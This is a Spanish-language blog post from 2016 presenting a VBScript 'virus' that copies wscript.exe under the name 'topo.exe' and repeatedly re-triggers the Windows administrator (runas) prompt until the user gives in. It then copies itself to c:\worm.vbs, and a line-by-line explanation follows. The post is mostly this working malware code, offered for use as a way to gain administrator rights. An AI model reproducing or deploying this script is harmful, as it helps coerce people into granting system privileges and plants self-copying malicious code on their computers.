lunes, 23 de mayo de 2016

Conseguir Permisos De Administrador Por El Metodo Persistente

Hola amigos hoy vengo con un script para poder conseguir permisos en el sistema, con un método que a muchos ya seles abra ocurrido, pienso que no nomas ami.

bueno este tema es cortito así que empecemos primeramente abriremos el bloc de notas y copiamos el siguiente código


option explicit
on error resume next
dim objShell,listser,WM,service,file,s

set file=createobject("scripting.filesystemobject")

file.copyfile "c:\windows\system32\wscript.exe","topo.exe"

comprovar

function comprovar
   
   Set WM =GetObject("winmgmts:")
   Set listser= WM.instancesof("win32_process")
   s=0
   For Each service In listser
      if service.name="topo.exe" then
         s=s+1   
      end if
   next

   if s=0 then
      Set objShell = CreateObject("Shell.Application")
      objShell.ShellExecute "topo.exe", Chr(34) & WScript.ScriptFullName & Chr(34) & " RunAsAdministrator", "", "runas", 1
   comprovar
   else   
      file.copyfile wscript.scriptfullname,"c:\worm.vbs"
      msgbox "Virus Copiado Con Exito En El Sistema..."
   end if
end function


y ahora se preguntaran que diablos hace este código pues les explicare de una manera corta



on error resume next
esta instrucción es para que no halla errores y si los hay los suprima y que el programa siga corriendo que no se detenga



dim objShell,listser,WM,service,file,s
aquí declaramos todas la variables que vamos a usar en nuestro programa, creo que no hay lió en eso


set file=createobject("scripting.filesystemobject")
aquí declaramos un objecto filesystemobject que es un objecto en el cual podremos trabajar con carpetas y archivos del sistema


file.copyfile "c:\windows\system32\wscript.exe","topo.exe"

en esta linea creamos una copia del archivo wscript.exe que es del sistema y la copia se llamara topo.exe y se almacenara en la unidad donde se este ejecutando el script


comprovar

aqui llama o manda ejecutar la función comprobar, dentro de esta función se encuentra lo siguiente


Set WM =GetObject("winmgmts:")
aquí crea un objecto winmgmts


Set listser= WM.instancesof("win32_process")
s=0
ahora aquí crea una instancia a los procesos del sistema y en el siguiente for recorre proceso por proceso preguntando si el proceso topo.exe esta ejecutándose y si es así ala variable s se le sumara 1


For Each service In listser
   if service.name="topo.exe" then
      s=s+1   
   end if
next

ahora saliendo del for pregunta si s es igual a cero si es así, crea un objecto shell.application para luego ejecutar el archivo topo.exe pasando le como parámetros el propio script y pidiendo permisos de administrador y como s es igual a cero volver a llamar la función comprobar volviéndose un ciclo hasta que el usuario presione si y conceda permisos de administrador ala aplicación topo.exe

if s=0 then
      Set objShell = CreateObject("Shell.Application")
      objShell.ShellExecute "topo.exe", Chr(34) & WScript.ScriptFullName & Chr(34) & " RunAsAdministrator", "", "runas", 1
   comprovar
   else   
      file.copyfile wscript.scriptfullname,"c:\worm.vbs"
      msgbox "Virus Copiado Con Exito En El Sistema..."
   end if


y por ultimo si el usuario concedió permisos el propio script se copiara a la unidad c:\


bueno saludos flamer y eso es todo

No hay comentarios.:

Publicar un comentario